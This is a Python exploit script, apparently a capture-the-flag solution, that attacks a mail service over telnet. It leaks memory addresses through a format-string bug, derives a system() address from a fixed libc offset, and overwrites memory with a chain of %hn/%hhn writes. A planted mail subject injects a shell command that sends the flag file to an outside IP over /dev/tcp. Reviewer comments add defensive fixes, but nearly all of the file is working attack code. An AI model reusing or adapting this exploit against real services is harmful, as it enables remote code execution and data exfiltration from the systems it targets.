#!/usr/bin/env python
#-*- coding:utf-8 -*-

import os, sys, socket
import telnetlib


# Opens the TCP session as soon as the module is loaded; S() and W() below
# both operate on this single module-level connection. No timeout is passed.
# NOTE(review): telnetlib is deprecated since Python 3.11 and removed in
# Python 3.13 (PEP 594).
st = telnetlib.Telnet('pwnbox.ztx.io', 2337)

def S(x):
    """Send *x* on the shared connection ``st`` exactly as given.

    Nothing is appended here; every caller in this script adds its own
    trailing newline.
    """
    st.write(x)

def W(x,Show=False):
    """Read from the shared connection ``st`` up to and including marker *x*.

    Returns everything that was read. When *Show* is true the data is also
    printed. No timeout is passed to ``read_until``, so the call waits until
    the marker arrives or the connection closes.
    """
    received = st.read_until(x)
    if not Show:
        return received
    print(received)
    return received


# Value sent as the mail Subject. It begins with ';' and pipes a command into
# /bin/bash that redirects `cat flag` to a /dev/tcp endpoint, so it only has an
# effect if the service ever hands the subject text to a shell.
# NOTE(review): presumably that happens through the pointer written by the
# FA() calls further down (see `system`) - confirm against the target binary.
cmd = ';echo "cat flag>/dev/tcp/166.111.132.155/1234 0<&1"|/bin/bash'
# Wait for the menu (its last line contains 'Exit') and pick entry '1', which
# prompts for To / Subject / Body (presumably "compose mail").
W('Exit')
S('1'+'\n')
W('To: ')
S('recver'+'\n')
W('Subject: ')
S(cmd+'\n')
W('Body')
# The body is three positional %lx conversions. The parsing below expects the
# service to print them expanded when the mail is read back, i.e. the stored
# body reaches a printf-style call as the format string (CWE-134).
# Service-side fix: print stored text with a constant format, e.g.
# printf("%s", body), and build with -Wformat -Wformat-security.
S('%15$lx,%21$lx,%34$lx'+'\n')
# Menu entry '3', then mail '1' (presumably "read mail").
W('Exit')
S('3'+'\n')
W('Subject: ')
S('1'+'\n')
# Skip the output up to the end of the next 'Subject:' line.
W('Subject:')
W('\n')

# The next line is expected to hold exactly three comma-separated hex values;
# anything else makes the tuple unpacking raise ValueError.
a,b,c= W('\n').strip().split(',')
# Third value plus a fixed offset.
# NOTE(review): presumably the leaked value is a libc address and 130251 is the
# distance to system() in the libc build the target runs - the constant is
# build-specific and not derived anywhere in this file.
system=int(c.split('\n')[0],16)+130251
# First value; not referenced again in the visible part of the script.
a=int(a.split('\n')[-1],16)
# Second value; only its low byte (b & 0xff) is used by the FA() calls below.
b=int(b,16)

def FA(fmt, mail = 2, delete = True):
    """Store one mail whose body is *fmt* and read it back once.

    The conversation is a fixed list of (prompt to wait for, reply to send)
    pairs driven through W() and S(): menu entry '1' with recipient 'recver',
    subject ``cmd`` and body *fmt*, then menu entry '3' and mail number *mail*.

    fmt    -- text sent as the mail body; a newline is appended.
    mail   -- number of the mail to select after entry '3'; the script waits
              for the matching '[<mail>]' marker first.
    delete -- when true, follow up with menu entry '4' and mail '2'
              (presumably "delete mail"). The '2' is fixed and does not
              follow *mail*.
    """
    slot = str(mail)
    exchanges = [
        ('Exit', '1'),
        ('To: ', 'recver'),
        ('Subject: ', cmd),
        ('Body', fmt),
        ('Exit', '3'),
        ('[' + slot + ']', slot),
    ]
    if delete:
        exchanges += [('Exit', '4'), ('[2]', '2')]

    for prompt, reply in exchanges:
        W(prompt)
        S(reply + '\n')

# Each FA() call stores a mail whose body is a printf format string and has the
# service render it once. '%0Nd' pads the output to N characters; '%K$hn' and
# '%K$hhn' store the number of characters printed so far through argument K as
# a 2-byte / 1-byte value.
# NOTE(review): argument positions 15, 21 and 27 and the constants 9056, 9058
# and 96 are specific to the target build; this file does not say what they
# address.
# Defensive note: these bodies only work because user-supplied text is used as
# the format string. A constant format on the service side removes the issue;
# glibc built with _FORTIFY_SOURCE=2 additionally aborts on %n in a format
# string that lives in writable memory.
FA("%09056d%21$hn")
FA("%0" + str(((b & 0xff) + 2) & 0xff)  + "d%15$hhn")
FA("%096d%21$hn")
FA("%0" + str(((b & 0xff) + 4) & 0xff)  + "d%15$hhn")
FA("%21$hn")
# From here on the mails are kept (delete = False), so the mail number passed
# to FA() increases with each call.
# The value named `system` is written in two 16-bit halves, low half first.
FA("%0" + str(system & 0xffff) + "d%27$hn", delete = False)
FA("%0" + str(b & 0xff) + "d%15$hhn", mail = 3, delete = False)
FA("%09058d%21$hn", mail = 4, delete = False)
FA("%0" + str((system >> 16) & 0xffff) + "d%27$hn", mail = 5, delete = False)

# Select menu entry '4' once more, then hand the connection over to the
# terminal for interactive use.
W('Exit')
S('4'+'\n')
st.interact()

